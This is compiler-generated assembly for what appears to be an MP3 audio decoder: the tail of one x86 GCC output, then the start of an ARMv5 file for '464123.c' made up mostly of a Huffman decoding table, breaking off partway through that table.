pretab.5, 84 pretab.5: .long 0 .long 0 .long 0 .long 0 .long 0 .long 0 .long 0 .long 0 .long 0 .long 0 .long 0 .long 1065353216 .long 1065353216 .long 1065353216 .long 1065353216 .long 1073741824 .long 1073741824 .long 1077936128 .long 1077936128 .long 1077936128 .long 1073741824 .local curr_sample_rate.4 .comm curr_sample_rate.4,4,4 .local audio.3 .comm audio.3,4,4 .local init.2 .comm init.2,4,4 .local init.1 .comm init.1,4,4 .local fd.0 .comm fd.0,4,4 .section .rodata .align 4 .LC1: .long 1068149419 .align 8 .LC16: .long 0 .long 1071644672 .align 8 .LC17: .long 1256670343 .long 1068914456 .align 4 .LC18: .long 1065353216 .align 8 .LC19: .long 0 .long 1077018624 .align 8 .LC20: .long 942502757 .long 1070645586 .align 8 .LC22: .long 0 .long 1075314688 .align 8 .LC23: .long 1413754136 .long 1074340347 .align 16 .LC24: .long -2147483648 .long 0 .long 0 .long 0 .align 8 .LC25: .long 1719614413 .long 1072079006 .align 8 .LC26: .long 1413754136 .long 1068048891 .align 8 .LC27: .long 0 .long 1088421824 .align 4 .LC28: .long 1056964608 .align 8 .LC29: .long 0 .long 1073741824 .align 8 .LC30: .long 0 .long 1070596096 .align 4 .LC31: .long 1129447424 .align 4 .LC32: .long 1090519040 .align 4 .LC33: .long 1048576000 .align 8 .LC34: .long 0 .long 1072693248 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "464123.c" .text .local filename .comm filename,4,4 .section .rodata .align 2 .LC0: .ascii "/dev/dsp\000" .data .align 2 .type audio_name, %object .size audio_name, 4 audio_name: .word .LC0 .section .rodata .align 2 .type g_huffman_table, %object .size g_huffman_table, 5608 g_huffman_table: .short 513 .short 0 .short 513 .short 16 .short 513 .short 1 .short 17 .short 513 .short 0 .short 1025 .short 513 .short 16 .short 1 .short 513 .short 17 .short 1025 .short 513 .short 32 .short 33 .short 513 .short 18 .short 513 .short 2 .short 34 .short 1025 .short 513 .short 0 .short 1 .short 513 .short 17 .short 513 .short 16 .short 1025 .short 513 .short 32 .short 33 .short 513 .short 18 .short 513 .short 2 .short 34 .short 513 .short 0 .short 1025 .short 513 .short 16 .short 1 .short 513 .short 17 .short 2049 .short 1025 .short 513 .short 32 .short 2 .short 513 .short 33 .short 18 .short 2049 .short 1025 .short 513 .short 34 .short 48 .short 513 .short 3 .short 19 .short 513 .short 49 .short 513 .short 50 .short 513 .short 35 .short 51 .short 1537 .short 1025 .short 513 .short 0 .short 16 .short 17 .short 1537 .short 513 .short 1 .short 513 .short 32 .short 33 .short 1537 .short 513 .short 18 .short 513 .short 2 .short 34 .short 1025 .short 513 .short 49 .short 19 .short 1025 .short 513 .short 48 .short 50 .short 513 .short 35 .short 513 .short 3 .short 51 .short 513 .short 0 .short 1025 .short 513 .short 16 .short 1 .short 2049 .short 513 .short 17 .short 1025 .short 513 .short 32 .short 2 .short 33 .short 4609 .short 1537 .short 513 .short 18 .short 513 .short 34 .short 48 .short 1025 .short 513 .short 49 .short 19 .short 1025 .short 513 .short 3 .short 50 .short 513 .short 35 .short 4 .short 2561 .short 1025 .short 513 .short 64 .short 65 .short 513 .short 20 .short 513 .short 66 .short 36 .short 3073 .short 1537 .short 1025 .short 513 .short 51 .short 67 .short 80 .short 1025 .short 513 .short 52 .short 5 .short 81 .short 1537 .short 513 .short 21 .short 513 .short 82 .short 37 .short 1025 .short 513 .short 68 .short 53 .short 1025 .short 513 .short 83 .short 84 .short 513 .short 69 .short 85 .short 1537 .short 513 .short 0 .short 513 .short 16 .short 1 .short 513 .short 17 .short 1025 .short 513 .short 33 .short 18 .short 3585 .short 1025 .short 513 .short 32 .short 2 .short 513 .short 34 .short 1025 .short 513 .short 48 .short 3 .short 513 .short 49 .short 19 .short 3585 .short 2049 .short 1025 .short 513 .short 50 .short 35 .short 513 .short 64 .short 4 .short 513 .short 65 .short 513 .short 20 .short 66 .short 3073 .short 1537 .short 513 .short 36 .short 513 .short 51 .short 80 .short 1025 .short 513 .short 67 .short 52 .short 81 .short 1537 .short 513 .short 21 .short 513 .short 5 .short 82 .short 1537 .short 513 .short 37 .short 513 .short 68 .short 53 .short 513 .short 83 .short 513 .short 69 .short 513 .short 84 .short 85 .short 2049 .short 1025 .short 513 .short 0 .short 16 .short 513 .short 1 .short 17 .short 2561 .short 1025 .short 513 .short 32 .short 33 .short 513 .short 18 .short 513 .short 2 .short 34 .short 3073 .short 1537 .short 1025 .short 513 .short 48 .short 3 .short 49 .short 513 .short 19 .short 513 .short 50 .short 35 .short 3073 .short 1025 .short 513 .short 65 .short 20 .short 1025 .short 513 .short 64 .short 51 .short 513 .short 66 .short 36 .short 2561 .short 1537 .short 1025 .short 513 .short 4 .short 80 .short 67 .short 513 .short 52 .short 81 .short 2049 .short 1025 .short 513 .short 21 .short 82 .short 513 .short 37 .short 68 .short 1537 .short 1025 .short 513 .short 5 .short 84 .short 83 .short 513 .short 53 .short 513 .short 69 .short 85 .short 513 .short 0 .short 1025 .short 513 .short 16 .short 1 .short 2561 .short 513 .short 17 .short 1025 .short 513 .short 32 .short 2 .short 513 .short 33 .short 18 .short 7169 .short 2049 .short 1025 .short 513 .short 34 .short 48 .short 513 .short 49 .short 19 .short 2049 .short 1025 .short 513 .short 3 .short 50 .short 513 .short 35 .short 64 .short 1025 .short 513 .short 65 .short 20 .short 1025 .short 513 .short 4 .short 51 .short 513 .short 66 .short 36 .short 7169 .short 2561 .short 1537 .short 1025 .short 513 .short 80 .short 5 .short 96 .short 513 .short 97 .short 22 .short 3073 .short 1537 .short 1025 .short 513 .short 67 .short 52 .short 81 .short 513 .short 21 .short 513 .short 82 .short 37 .short 1025 .short 513 .short 38 .short 54 .short 113 .short 5121 .short 2049 .short 513 .short 23 .short 1025 .short 513 .short 68 .short 83 .short 6 .short 1537 .short 1025 .short 513 .short 53 .short 69 .short 98 .short 513 .short 112 .short 513 .short 7 .short 100 .short 3585 .short 1025 .short 513 .short 114 .short 39 .short 1537 .short 513 .short 99 .short 513 .short 84 .short 85 .short 513 .short 70 .short 115 .short 2049 .short 1025 .short 513 .short 55 .short 101 .short 513 .short 86 .short 116 .short 1537 .short 513 .short 71 .short 513 .short 102 .short 117 .short 1025 .short 513 .short 87 .short 118 .short 513 .short 103 .short 119 .short 1537 .short 513 .short 0 .short 513 .short 16 .short 1 .short 2049 .short 513 .short 17 .short 1025 .short 513 .short 32 .short 2 .short 18 .short 6145 .short 2049 .short 513 .short 33 .short 513 .short 34 .short 513 .short 48 .short 3 .short 1025 .short 513 .short 49 .short 19 .short 1025 .short 513 .short 50 .short 35 .short 1025 .short 513 .short 64 .short 4 .short 513 .short 65 .short 20 .short 7681 .short 4097 .short 2561 .short 1025 .short 513 .short 66 .short 36 .short 1025 .short 513 .short 51 .short 67 .short 80 .short 1025 .short 513 .short 52 .short 81 .short 97 .short 1537 .short 513 .short 22 .short 513 .short 6 .short 38 .short 513 .short 98 .short 513 .short 21 .short 513 .short 5 .short 82 .short 4097 .short 2561 .short 1537 .short 1025 .short 513 .short 37 .short 68 .short 96 .short 513 .short 99 .short 54 .short 1025 .short 513 .short 112 .short 23 .short 113 .short 4097 .short 1537 .short 1025 .short 513 .short 7 .short 100 .short 114 .short 513 .short 39 .short 1025 .short 513 .short 83 .short 53 .short 513 .short 84 .short 69 .short 2561 .short 1025 .short 513 .short 70 .short 115 .short 513 .short 55 .short 513 .short 101 .short 86 .short 2561 .short 1537 .short 1025 .short 513 .short 85 .short 87 .short 116 .short 513 .short 71 .short 102 .short 1025 .short 513 .short 117 .short 118 .short 513 .short 103 .short 119 .short 3073 .short 1025 .short 513 .short 16 .short 1 .short 513 .short 17 .short 513 .short 0 .short 513 .short 32 .short 2 .short 4097 .short 1025 .short 513 .short 33 .short 18 .short 1025 .short 513 .short 34 .short 49 .short 513 .short 19 .short 513 .short 48 .short 513 .short 3 .short 64 .short 6657 .short 2049 .short 1025 .short 513 .short 50 .short 35 .short 513 .short 65 .short 51 .short 2561 .short 1025 .short 513 .short 20 .short 66 .short 513 .short 36 .short 513 .short 4 .short 80 .short 1025 .short 513 .short 67 .short 52 .short 513 .short 81 .short 21 .short 7169 .short 3585 .short 2049 .short 1025 .short 513 .short 82 .short 37 .short 513 .short 83 .short 53 .short 1025 .short 513 .short 96 .short 22 .short 97 .short 1025 .short 513 .short 98 .short 38 .short 1537 .short 1025 .short 513 .short 5 .short 6 .short 68 .short 513 .short 84 .short 69 .short 4609 .short 2561 .short 1025 .short 513 .short 99 .short 54 .short 1025 .short 513 .short 112 .short 7 .short 113 .short 1025 .short 513 .short 23 .short 100 .short 513 .short 70 .short 114 .short 2561 .short 1537 .short 513 .short 39 .short 513 .short 85 .short 115 .short 513 .short 55 .short 86 .short 2049 .short 1025 .short 513 .short 101 .short 116 .short 513 .short 71 .short 102 .short 1025 .short 513 .short 117 .short 87 .short 513 .short 118 .short 513 .short 103 .short 119 .short 513 .short 0 .short 1537 .short 513 .short 16 .short 513 .short 1 .short 17 .short 7169 .short 2049 .short 1025 .short 513 .short 32 .short 2 .short 513 .short 33 .short 18 .short 2049 .short 1025 .short 513 .short 34 .short 48 .short 513 .short 3 .short 49 .short 1537 .short 513 .short 19 .short 513 .short 50 .short 35 .short 1025 .short 513 .short 64 .short 4 .short 65 .short 17921 .short 7169 .short 3585 .short 1537 .short 513 .short 20 .short 513 .short 51 .short 66 .short 1025 .short 513 .short 36 .short 80 .short 513 .short 67 .short 52 .short 1025 .short 513 .short 81 .short 21 .short 1025 .short 513 .short 5 .short 82 .short 513 .short 37 .short 513 .short 68 .short 83 .short 3585 .short 2049 .short 1025 .short 513 .short 96 .short 6 .short 513 .short 97 .short 22 .short 1025 .short 513 .short 128 .short 8 .short 129 .short 4097 .short 2049 .short 1025 .short 513 .short 53 .short 98 .short 513 .short 38 .short 84 .short 1025 .short 513 .short 69 .short 99 .short 513 .short 54 .short 112 .short 1537 .short 1025 .short 513 .short 7 .short 85 .short 113 .short 513 .short 23 .short 513 .short 39 .short 55 .short 18433 .short 6145 .short 3073 .short 1025 .short 513 .short 24 .short 130 .short 513 .short 40 .short 1025 .short 513 .short 100 .short 70 .short 114 .short 2049 .short 1025 .short 513 .short 132 .short 72 .short 513 .short 144 .short 9 .short 513 .short 145 .short 25 .short 6145 .short 3585 .short 2049 .short 1025 .short 513 .short 115 .short 101 .short 513 .short 86 .short 116 .short 1025 .short 513 .short 71 .short 102 .short 131 .short 1537 .short 513 .short 56 .short 513 .short 117 .short 87 .short 513 .short 146 .short 41 .short 3585 .short 2049 .short 1025 .short 513 .short 103 .short 133 .short 513 .short 88 .short 57 .short 513 .short 147 .short 513 .short 73 .short 134 .short 1537 .short 513 .short 160 .short 513 .short 104 .short 10 .short 513 .short 161 .short 26 .short 17409 .short 6145 .short 3073 .short 1025 .short 513 .short 162 .short 42 .short 1025 .short 513 .short 149 .short 89 .short 513 .short 163 .short 58 .short 2049 .short 1025 .short 513 .short 74 .short 150 .short 513 .short 176 .short 11 .short 513 .short 177 .short 27 .short 5121 .short 2049 .short 513 .short 178 .short 1025 .short 513 .short 118 .short 119 .short 148 .short 1537 .short 1025 .short 513 .short 135 .short 120 .short 164 .short 1025 .short 513 .short 105 .short 165 .short 43 .short 3073 .short 1537 .short 1025 .short 513 .short 90 .short 136 .short 179 .short 513 .short 59 .short 513 .short 121 .short 166 .short 1537 .short 1025 .short 513 .short 106 .short 180 .short 192 .short 1025 .short 513 .short 12 .short 152 .short 193 .short 15361 .short 5633 .short 2561 .short 1537 .short 513 .short 28 .short 513 .short 137 .short 181 .short 513 .short 91 .short 194 .short 1025 .short 513 .short 44 .short 60 .short 1025 .short 513 .short 182 .short 107 .short 513 .short 196 .short 76 .short 4097 .short 2049 .short 1025 .short 513 .short 168 .short 138 .short 513 .short 208 .short 13 .short 513 .short 209 .short 513 .short 75 .short 513 .short 151 .short 167 .short 3073 .short 1537 .short 513 .short 195 .short 513 .short 122 .short 153 .short 1025 .short 513 .short 197 .short 92 .short 183 .short 1025 .short 513 .short 29 .short 210 .short 513 .short 45 .short 513 .short 123 .short 211 .short 13313 .short 7169 .short 3073 .short 1025 .short 513 .short 61 .short 198 .short 1025 .short 513 .short 108 .short 169 .short 513 .short 154 .short 212 .short 2049 .short 1025 .short 513 .short 184 .short 139 .short 513 .short 77 .short 199 .short 1025 .short 513 .short 124 .short 213 .short 513 .short 93 .short 224 .short 2561 .short 1025 .short 513 .short 225 .short 30 .short 1025 .short 513 .short 14 .short 46 .short 226 .short 2049 .short 1025 .short 513 .short 227 .short 109 .short 513 .short 140 .short 228 .short 1025 .short 513 .short 229 .short 186 .short 240 .short 9729 .short 4097 .short 1025 .short 513 .short 241 .short 31 .short 1537 .short 1025 .short 513 .short 170 .short 155 .short 185 .short 513 .short 62 .short 513 .short 214 .short 200 .short 3073 .short 1537 .short 513 .short 78 .short 513 .short 215 .short 125 .short 513 .short 171 .short 513 .short 94 .short 201 .short 1537 .short 513 .short 15 .short 513 .short 156 .short 110 .short 513 .short 242 .short 47 .short 8193 .short 4097 .short 1537 .short 1025 .short 513 .short 216 .short 141 .short 63 .short 1537 .short 513 .short 243 .short 513 .short 230 .short 202 .short 513 .short 244 .short 79 .short 2049 .short 1025 .short 513 .short 187 .short 172 .short 513 .short 231 .short 245 .short 1025 .short 513 .short 217 .short 157 .short 513 .short 95 .short 232 .short 7681 .short 3073 .short 1537 .short 513 .short 111 .short 513 .short 246 .short 203 .short 1025 .short 513 .short 188 .short 173 .short 218 .short 2049 .short 513 .short 247 .short 1025 .short 513 .short 126 .short 127 .short 142 .short 1537 .short 1025 .short 513 .short 158 .short 174 .short 204 .short 513 .short 248 .short 143 .short 4609 .short 2049 .short 1025 .short 513 .short 219 .short 189 .short 513 .short 234 .short 249 .short 1025 .short 513 .short 159 .short 235 .short 513 .short 190 .short 513 .short 205 .short 250 .short 3585 .short 1025 .short 513 .short 221 .short 236 .short 1537 .short 1025 .short 513 .short 233 .short 175 .short 220 .short 513 .short 206 .short 251 .short 2049 .short 1025 .short 513 .short 191 .short 222 .short 513 .short 207 .short 238 .short 1025 .short 513 .short 223 .short 239 .short 513 .short 255 .short 513 .short 237 .short 513 .short 253 .short 513 .short 252 .short 254 .short 4097 .short 1537 .short 513 .short 0 .short 513 .short 16 .short 1 .short 513 .short 17 .short 1025 .short 513 .short 32 .short 2 .short 513 .short 33 .short 18 .short 12801 .short 4097 .short 1537 .short 513 .short 34 .short 513 .short 48 .short 49 .short 1537 .short 513 .short 19 .short 513 .short 3 .short 64 .short 513 .short 50 .short 35 .short 3585 .short 1537 .short 1025 .short 513 .short 4 .short 20 .short 65 .short 1025 .short 513 .short 51 .short 66 .short 513 .short 36 .short 67 .short 2561 .short 1537 .short 513 .short 52 .short 513 .short 80 .short 5 .short 513 .short 81 .short 21 .short 1025 .short 513 .short 82 .short 37 .short 1025 .short 513 .short 68 .short 83 .short 97 .short 23041 .short 9217 .short 4609 .short 2561 .short 1537 .short 513 .short 53 .short 513 .short 96 .short 6 .short 513 .short 22 .short 98 .short 1025 .short 513 .short 38 .short 84 .short 513 .short 69 .short 99 .short 2561 .short 1537 .short 513 .short 54 .short 513 .short 112 .short 7 .short 513 .short 113 .short 85 .short 1025 .short 513 .short 23 .short 100 .short 513 .short 114 .short 39 .short 6145 .short 4097 .short 2049 .short 1025 .short 513 .short 70 .short 115 .short 513 .short 55 .short 101 .short 1025 .short 513 .short 86 .short 128 .short 513 .short 8 .short 116 .short 1025 .short 513 .short 129 .short 24 .short 513 .short 130 .short 40 .short 4097 .short 2049 .short 1025 .short 513 .short 71 .short 102 .short 513 .short 131 .short 56 .short 1025 .short 513 .short 117 .short 87 .short 513 .short 132 .short 72 .short 1537 .short 1025 .short 513 .short 144 .short 25 .short 145 .short 1025 .short 513 .short 146 .short 118 .short 513 .short 103 .short 41 .short 23553 .short 9217 .short 4609 .short 2561 .short 1025 .short 513 .short 133 .short 88 .short 1025 .short 513 .short 9 .short 119 .short 147 .short 1025 .short 513 .short 57 .short 148 .short 513 .short 73 .short 134 .short 2561 .short 1537 .short 513 .short 104 .short 513 .short 160 .short 10 .short 513 .short 161 .short 26 .short 1025 .short 513 .short 162 .short 42 .short 513 .short 149 .short 89 .short 6657 .short 3585 .short 1537 .short 513 .short 163 .short 513 .short 58 .short 135 .short 1025 .short 513 .short 120 .short 164 .short 513 .short 74 .short 150 .short 1537 .short 1025 .short 513 .short 105 .short 176 .short 177 .short 1025 .short 513 .short 27 .short 165 .short 178 .short 3585 .short 2049 .short 1025 .short 513 .short 90 .short 43 .short 513 .short 136 .short 151 .short 513 .short 179 .short 513 .short 121 .short 59 .short 2049 .short 1025 .short 513 .short 106 .short 180 .short 513 .short 75 .short 193 .short 1025 .short 513 .short 152 .short 137 .short 513 .short 28 .short 181 .short 20481 .short 8705 .short 4097 .short 1537 .short 1025 .short 513 .short 91 .short 44 .short 194 .short 1537 .short 1025 .short 513 .short 11 .short 192 .short 166 .short 513 .short 167 .short 122 .short 2561 .short 1025 .short 513 .short 195 .short 60 .short 1025 .short 513 .short 12 .short 153 .short 182 .short 1025 .short 513 .short 107 .short 196 .short 513 .short 76 .short 168 .short 5121 .short 2561 .short 1025 .short 513 .short 138 .short 197 .short 1025 .short 513 .short 208 .short 92 .short 209 .short 1025 .short 513 .short 183 .short 123 .short 513 .short 29 .short 513 .short 13 .short 45 .short 3073 .short 1025 .short 513 .short 210 .short 211 .short 1025 .short 513 .short 61 .short 198 .short 513 .short 108 .short 169 .short 1537 .short 1025 .short 513 .short 154 .short 184 .short 212 .short 1025 .short 513 .short 139 .short 77 .short 513 .short 199 .short 124 .short 17409 .short 8705 .short 4609 .short 2561 .short 1025 .short 513 .short 213 .short 93 .short 1025 .short 513 .short 224 .short 14 .short 225 .short 1025 .short 513 .short 30 .short 226 .short 513 .short 170 .short 46 .short 2049 .short 1025 .short 513 .short 185 .short 155 .short 513 .short 227 .short 214 .short 1025 .short 513 .short 109 .short 62 .short 513 .short 200 .short 140 .short 4097 .short 2049 .short 1025 .short 513 .short 228 .short 78 .short 513 .short 215 .short 125 .short 1025 .short 513 .short 229 .short 186 .short 513 .short 171 .short 94 .short 2049 .short 1025 .short 513 .short 201 .short 156 .short 513 .short 241 .short 31 .short 1537 .short 1025 .short 513 .short 240 .short 110 .short 242 .short 513 .short 47 .short 230 .short 9729 .short 4609 .short 2049 .short 1025 .short 513 .short 216 .short 243 .short 513 .short 63 .short 244 .short 1537 .short 513 .short 79 .short 513 .short 141 .short 217 .short 513 .short 187 .short 202 .short 2049 .short 1025 .short 513 .short 172 .short 231 .short 513 .short 126 .short 245 .short 2049 .short 1025 .short 513 .short 157 .short 95 .short 513 .short 232 .short 142 .short 513 .short 246 .short 203 .short 8705 .short 4609 .short 2561 .short 1537 .short 1025 .short 513 .short 15 .short 174 .short 111 .short 513 .short 188 .short 218 .short 1025 .short 513 .short 173 .short 247 .short 513 .short 127 .short 233 .short 2049 .short 1025 .short 513 .short 158 .short 204 .short 513 .short 248 .short 143 .short 1025 .short 513 .short 219 .short 189 .short 513 .short 234 .short 249 .short 4097 .short 2049 .short 1025 .short 513 .short 159 .short 220 .short 513 .short 205 .short 235 .short 1025 .short 513 .short 190 .short 250 .short 513 .short 175 .short 221 .short 3585 .short 1537 .short 1025 .short 513 .short 236 .short 206 .short 251 .short 1025 .short 513 .short 191 .short 237 .short 513 .short 222 .short 252 .short 1537 .short 1025 .short 513 .short 207 .short 253 .short 238 .short 1025 .short 513 .short 223 .short 254 .short 513 .short 239 .short 255 .short 513 .short 0 .short 1537 .short 513 .short 16 .short 513 .short 1 .short 17 .short 10753 .short 2049 .short 1025 .short 513 .short 32 .short 2 .short 513 .short 33 .short 18 .short 2561 .short 1537 .short 513 .short 34 .short 513 .short 48 .short 3 .short 513 .short 49 .short 19 .short 2561 .short 1025 .short 513 .short 50 .short 35 .short 1025 .short 513 .short 64 .short 4 .short 65 .short 1537 .short 513 .short 20 .short 513 .short 51 .short 66 .short 1025 .short 513 .short 36 .short 80 .short 513 .short 67 .short 52 .short -30207 .short 10241 .short 4097 .short 1537 .short 1025 .short 513 .short 5 .short 21 .short 81 .short 1025 .short 513 .short 82 .short 37 .short 1025 .short 513 .short 68 .short 53 .short 83 .short 2561 .short 1537 .short 1025 .short 513 .short 96 .short 6 .short 97 .short 513 .short 22 .short 98 .short 2049 .short 1025 .short 513 .short 38 .short 84 .short 513 .short 69 .short 99 .short 1025 .short 513 .short 54 .short 112 .short 113 .short 10241 .short 4609 .short 2049 .short 513 .short 23 .short 513 .short 7 .short 513 .short 85 .short 100 .short 1025 .short 513 .short 114 .short 39 .short 1025 .short 513 .short 70 .short 101 .short 115 .short 2561 .short 1537 .short 513 .short 55 .short 513 .short 86 .short 8 .short 513 .short 128 .short 129 .short 1537 .short 513 .short 24 .short 513 .short 116 .short 71 .short 513 .short 130 .short 513 .short 40 .short 102 .short 6145 .short 3585 .short 2049 .short 1025 .short 513 .short 131 .short 56 .short 513 .short 117 .short 132 .short 1025 .short 513 .short 72 .short 144 .short 145 .short 1537 .short 513 .short 25 .short 513 .short 9 .short 118 .short 513 .short 146 .short 41 .short 3585 .short 2049 .short 1025 .short 513 .short 133 .short 88 .short 513 .short 147 .short 57 .short 1025 .short 513 .short 160 .short 10 .short 26 .short 2049 .short 513 .short 162 .short 513 .short 103 .short 513 .short 87 .short 73 .short 1537 .short 513 .short 148 .short 513 .short 119 .short 134 .short 513 .short 161 .short 513 .short 104 .short 149 .short -9215 .short 32257 .short 12801 .short 6657 .short 3073 .short 1537 .short 513 .short 42 .short 513 .short 89 .short 58 .short 513 .short 163 .short 513 .short 135 .short 120 .short 2049 .short 1025 .short 513 .short 164 .short 74 .short 513 .short 150 .short 105 .short 1025 .short 513 .short 176 .short 11 .short 177 .short 2561 .short 1025 .short 513 .short 27 .short 178 .short 513 .short 43 .short 513 .short 165 .short 90 .short 1537 .short 513 .short 179 .short 513 .short 166 .short 106 .short 1025 .short 513 .short 180 .short 75 .short 513 .short 12 .short 193 .short 7681 .short 3585 .short 1537 .short 1025 .short 513 .short 181 .short 194 .short 44 .short 1025 .short 513 .short 167 .short 195 .short 513 .short 107 .short 196 .short 2049 .short 513 .short 29 .short 1025 .short 513 .short 136 .short 151 .short 59 .short 1025 .short 513 .short 209 .short 210 .short 513 .short 45 .short 211 .short 4609 .short 1537 .short 1025 .short 513 .short 30 .short 46 .short 226 .short 1537 .short 1025 .short 513 .short 121 .short 152 .short 192 .short 513 .short 28 .short 513 .short 137 .short 91 .short 3585 .short 1537 .short 513 .short 60 .short 513 .short 122 .short 182 .short 1025 .short 513 .short 76 .short 153 .short 513 .short 168 .short 138 .short 1537 .short 513 .short 13 .short 513 .short 197 .short 92 .short 1025 .short 513 .short 61 .short 198 .short 513 .short 108 .short 154 .short 22529 .short 22017 .short 9217 .short 4097 .short 2049 .short 1025 .short 513 .short 139 .short 77 .short 513 .short 199 .short 124 .short 1025 .short 513 .short 213 .short 93 .short 513 .short 224 .short 14 .short 2049 .short 513 .short 227 .short 1025 .short 513 .short 208 .short 183 .short 123 .short 1537 .short 1025 .short 513 .short 169 .short 184 .short 212 .short 513 .short 225 .short 513 .short 170 .short 185 .short 6145 .short 2561 .short 1537 .short 1025 .short 513 .short 155 .short 214 .short 109 .short 513 .short 62 .short 200 .short 1537 .short 1025 .short 513 .short 140 .short 228 .short 78 .short 1025 .short 513 .short 215 .short 229 .short 513 .short 186 .short 171 .short 3073 .short 1025 .short 513 .short 156 .short 230 .short 1025 .short 513 .short 110 .short 216 .short 513 .short 141 .short 187 .short 2049 .short 1025 .short 513 .short 231 .short 157 .short 513 .short 232 .short 142 .short 1025 .short 513 .short 203 .short 188 .short 158 .short 241 .short 513 .short 31 .short 513 .short 15 .short 47 .short 16897 .short 14337 .short 513 .short 242 .short 13313 .short 12801 .short 5121 .short 2049 .short 513 .short 189 .short 513 .short 94 .short 513 .short 125 .short 201 .short 1537 .short 513 .short 202 .short 513 .short 172 .short 126 .short 1025 .short 513 .short 218 .short 173 .short 204 .short 2561 .short 1537 .short 513 .short 174 .short 513 .short 219 .short 220 .short 513 .short 205 .short 190 .short 1537 .short 1025 .short 513 .short 235 .short 237 .short 238 .short 1537 .short 1025 .short 513 .short 217 .short 234 .short 233 .short 513 .short 222 .short 1025 .short 513 .short 221 .short 236 .short 206 .short 63 .short 240 .short 1025 .short 513 .short 243 .short 244 .short 513 .short 79 .short 513 .short 245 .short 95 .short 2561 .short 513 .short 255 .short 1025 .short 513 .short 246 .short 111 .short 513 .short 247 .short 127 .short 3073 .short 1537 .short 513 .short 143 .short 513 .short 248 .short 249 .short 1025 .short 513 .short 159 .short 250 .short 175 .short 2049 .short 1025 .short 513 .short 251 .short 191 .short 513 .short 252 .short 207 .short 1025 .short 513 .short 253 .short 223 .short 513 .short 254 .short 239 .short 15361 .short 2049 .short 1025 .short 513 .short 0 .short 16 .short 513 .short 1 .short 17 .short 3585 .short 1537 .short 1025 .short 513 .short 32 .short 2 .short 33 .short 513 .short 18 .short 513 .short 34 .short 513 .short 48 .short 3 .short 3585 .short 1025 .short 513 .short 49 .short 19 .short 1025 .short 513 .short 50 .short 35 .short 1025 .short 513 .short 64 .short 4 .short 65 .short 2049 .short 1025 .short 513 .short 20 .short 51 .short 513 .short 66 .short 36 .short 1537 .short 1025 .short 513 .short 67 .short 52 .short 81 .short 1537 .short 1025 .short 513 .short 80 .short 5 .short 21 .short 513 .short 82 .short 37 .short -1535 .short 25089 .short 8705 .short 4609 .short 2561 .short 1025 .short 513 .short 68 .short 83 .short 513 .short 53 .short 513 .short 96 .short 6 .short 1025 .short 513 .short 97 .short 22 .short 513 .short 98 .short 38 .short 2049 .short 1025 .short 513 .short 84 .short 69 .short 513 .short 99 .short 54 .short 1025 .short 513 .short 113 .short 85 .short 513 .short 100 .short 70 .short 8193 .short 3585 .short 1537 .short 513 .short 114 .short 513 .short 39 .short 55 .short 513 .short 115 .short 1025 .short 513 .short 112 .short 7 .short 23 .short 2561 .short 1025 .short 513 .short 101 .short 86 .short 1025 .short 513 .short 128 .short 8 .short 129 .short 1025 .short 513 .short 116 .short 71 .short 513 .short 24 .short 130 .short 4097 .short 2049 .short 1025 .short 513 .short 40 .short 102 .short 513 .short 131 .short 56 .short 1025 .short 513 .short 117 .short 87 .short 513 .short 132 .short 72 .short 2049 .short 1025 .short 513 .short 145 .short 25 .short 513 .short 146 .short 118 .short 1025 .short 513 .short 103 .short 41 .short 513 .short 133 .short 88 .short 23553 .short 8705 .short 4097 .short 2049 .short 1025 .short 513 .short 147 .short 57 .short 513 .short 148 .short 73 .short 1025 .short 513 .short 119 .short 134 .short 513 .short 104 .short 161 .short 2049 .short 1025 .short 513 .short 162 .short 42 .short 513 .short 149 .short 89 .short 1025 .short 513 .short 163 .short 58 .short 513 .short 135 .short 513 .short 120 .short 74 .short 5633 .short 3073 .short 1025 .short 513 .short 164 .short 150 .short 1025 .short 513 .short 105 .short 177 .short 513 .short 27 .short 165 .short 1537 .short 513 .short 178 .short 513 .short 90 .short 43 .short 513 .short 136 .short 179 .short 4097 .short 2561 .short 1537 .short 513 .short 144 .short 513 .short 9 .short 160 .short 513 .short 151 .short 121 .short 1025 .short 513 .short 166 .short 106 .short 180 .short 3073 .short 1537 .short 513 .short 26 .short 513 .short 10 .short 176 .short 513 .short 59 .short 513 .short 11 .short 192 .short 1025 .short 513 .short 75 .short 193 .short 513 .short 152 .short 137 .short 17153 .short 8705 .short 4097 .short 2049 .short 1025 .short 513 .short 28 .short 181 .short 513 .short 91 .short 194 .short 1025 .short 513 .short 44 .short 167 .short 513 .short 122 .short 195 .short 2561 .short 1537 .short 513 .short 60 .short 513 .short 12 .short 208 .short 513 .short 182 .short 107 .short 1025 .short 513 .short 196 .short 76 .short 513 .short 153 .short 168 .short 4097 .short 2049 .short 1025 .short 513 .short 138 .short 197 .short 513 .short 92 .short 209 .short 1025 .short 513 .short 183 .short 123 .short 513 .short 29 .short 210 .short 2305 .short 1025 .short 513 .short 45 .short 211 .short 513 .short 61 .short 198 .short 22010 .short 1025 .short 513 .short 108 .short 169 .short 513 .short 154 .short 212 .short 8193 .short 4097 .short 2049 .short 1025 .short 513 .short 184 .short 139 .short 513 .short 77 .short 199 .short 1025 .short 513 .short 124 .short 213 .short 513 .short 93 .short 225 .short 2049 .short 1025 .short 513 .short 30 .short 226 .short 513 .short 170 .short 185 .short 1025 .short 513 .short 155 .short 227 .short 513 .short 214 .short 109 .short 5121 .short 2561 .short 1537 .short 513 .short 62 .short 513 .short 46 .short 78 .short 513 .short 200 .short 140 .short 1025 .short 513 .short 228 .short 215 .short 1025 .short 513 .short 125 .short 171 .short 229 .short 2561 .short 1025 .short 513 .short 186 .short 94 .short 513 .short 201 .short 513 .short 156 .short 110 .short 2049 .short 513 .short 230 .short 513 .short 13 .short 513 .short 224 .short 14 .short 1025 .short 513 .short 216 .short 141 .short 513 .short 187 .short 202 .short 18945 .short 513 .short 255 .short 16385 .short 14849 .short 8193 .short 4097 .short 2049 .short 1025 .short 513 .short 172 .short 231 .short 513 .short 126 .short 217 .short 1025 .short 513 .short 157 .short 232 .short 513 .short 142 .short 203 .short 2049 .short 1025 .short 513 